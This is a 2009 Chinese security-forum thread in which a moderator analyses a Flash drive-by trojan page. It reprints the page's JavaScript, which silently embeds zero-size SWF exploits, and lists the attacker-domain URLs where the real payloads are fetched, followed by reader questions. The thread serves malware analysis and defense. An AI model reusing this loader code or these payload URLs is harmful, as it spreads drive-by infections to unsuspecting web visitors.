再谈flash网马解密(二) - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流再谈flash网马解密(二)

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[教程] 再谈flash网马解密(二)

本主题由版主 networkedition 于 2009-7-1 10:19:04 执行关闭主题/取消操作

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-01 09:43 \| 只看楼主短消息资料字号：小中大 1楼再谈flash网马解密(二) flash网马地址：http://vpsvip.com/aa/vcfl.htm，使用freshow获取的源代码如下： [复制到剪贴板] CODE: <script> document.writeln("<script>function init(){window.status=\"\";}window.onload = init;"); document.writeln("window.onerror=function(){return true;}"); document.writeln(""); document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"ms"+"ie\")>0)"); document.writeln("{"); document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');"); document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');"); document.writeln("document.write(\'<param name=\"movie\" value=\"1111111111.swf\"\/>\');"); document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');"); document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');"); document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');"); document.writeln("document.write(\'<\/object>\');"); document.writeln("}"); document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}"); document.writeln("<\/script>") </script> 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-01 09:52 \| 只看楼主短消息资料字号：小中大 2楼回复: 再谈flash网马解密(二) 我们先来简单分析一下这段代码，主要是下面两段代码： document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');"); document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}"); 实际上这个源代码中包含有两个swf文件，其下载地址分别为：http://vpsvip.com/aa/1111111111.swf，http://vpsvip.com/aa/2222222222.swf。使用下载工具将swf下载（以1111111111.swf为例），使用记事本方式打开，其源文件内容如下： 1111swf.jpg (1359.38 K) 2009-7-1 9:51:42
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-01 10:09 \| 只看楼主短消息资料字号：小中大 3楼回复: 再谈flash网马解密(二) 我们着重来看红色框内容：flashVersion /:$version i1007.asp?ytytyt= _root ?，这段代码是否很熟悉，在我们讲解的一个迷惑人的flash网马一文中，讲到过类似内容。在这里我就不在详细讲解，具体可参看一个迷惑人的flash网马一文中，6楼小聪版主讲解的关于Flashver正确形式内容。我们参照该文中Flashver形式，实际上真正的swf网马下载地址如下：http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,28,0 或http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,16,0其余版本都可以，这里就不依次写出。按照这个地址我们使用下载工具，下载到一个i1007.swf文件，也有可能为i1007.asp，将asp改为swf即可。 1007swf.jpg (1370.40 K) 2009-7-1 10:09:03 networkedition 最后编辑于 2009-07-01 10:15:11
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-07-01 10:14 \| 只看楼主短消息资料字号：小中大 4楼回复: 再谈flash网马解密(二) 使用redoce的A>PDF/CWS/Zlib Extractor，进行swf解密，具体操作方法可参看教程：网马解密工具redoce视频之——swf篇一文。最终解密结果见下图： 1007swf结果.jpg (988.80 K) 2009-7-1 10:14:04 2222222222.swf这个swf网马就不讲解了，感兴趣的可参考本篇教程，自行尝试解密，方法都一样。 networkedition 最后编辑于 2009-07-01 10:17:12
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

pcshare 拙长孩提狮帖子:138 注册: 2009-07-01 来自:我家	发表于： 2009-07-01 23:43 \| 短消息资料字号：小中大 5楼回复：再谈flash网马解密(二) 这种木马是怎么生效的？
pcshare 拙长孩提狮帖子:138 注册: 2009-07-01 来自:我家

於陵闲云卡卡反病毒小组帖子:113 注册: 2007-11-28 来自:	发表于： 2009-07-02 21:26 \| 短消息资料字号：小中大 6楼回复：再谈flash网马解密(二) 后排坚持听讲 0.电脑安防交流群：79272952 1.下载windows清理助手，升级后清理系统。地址：http://download.arswp.com/arswp3/x86/arswp3_x86.zip 2.下载SREng，地址：http://download.kztechs.com/files/sreng2.zip 3.解压后运行SREngLdr.exe---智能扫描---扫描---保存报告。 4.将SREng.log日志文件压缩后上传。。
於陵闲云卡卡反病毒小组帖子:113 注册: 2007-11-28 来自:

青春小痞初生襁褓狮帖子:23 注册: 2009-06-22 来自:	发表于： 2009-07-03 09:02 \| 短消息资料字号：小中大 7楼回复：再谈flash网马解密(二) 我解压程序后也有乱码，为什么会出现乱码啊
青春小痞初生襁褓狮帖子:23 注册: 2009-06-22 来自:

⒎溡ωǒ很壞初生襁褓狮帖子:9 注册: 2008-08-11 来自:	发表于： 2009-07-03 12:46 \| 短消息资料字号：小中大 8楼回复：再谈flash网马解密(二) 乱码是应为 swf文件用TXT格式打开
⒎溡ωǒ很壞初生襁褓狮帖子:9 注册: 2008-08-11 来自:

基牛强壮不惑狮帖子:841 注册: 2009-06-19 来自:	发表于： 2009-08-11 10:11 \| 短消息资料字号：小中大 9楼回复：再谈flash网马解密(二) http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,28,0 或http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,16,0 后面的WIN%209,0,16,0，WIN%209,0,28,0这两个是怎么得出来的 networkedition 最后编辑于 2009-08-11 10:19:24
基牛强壮不惑狮帖子:841 注册: 2009-06-19 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-11 10:22 \| 只看楼主短消息资料字号：小中大 10楼回复: 再谈flash网马解密(二) 具体可参看一个迷惑人的flash网马一文中，6楼小聪版主讲解的关于Flashver正确形式内容。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT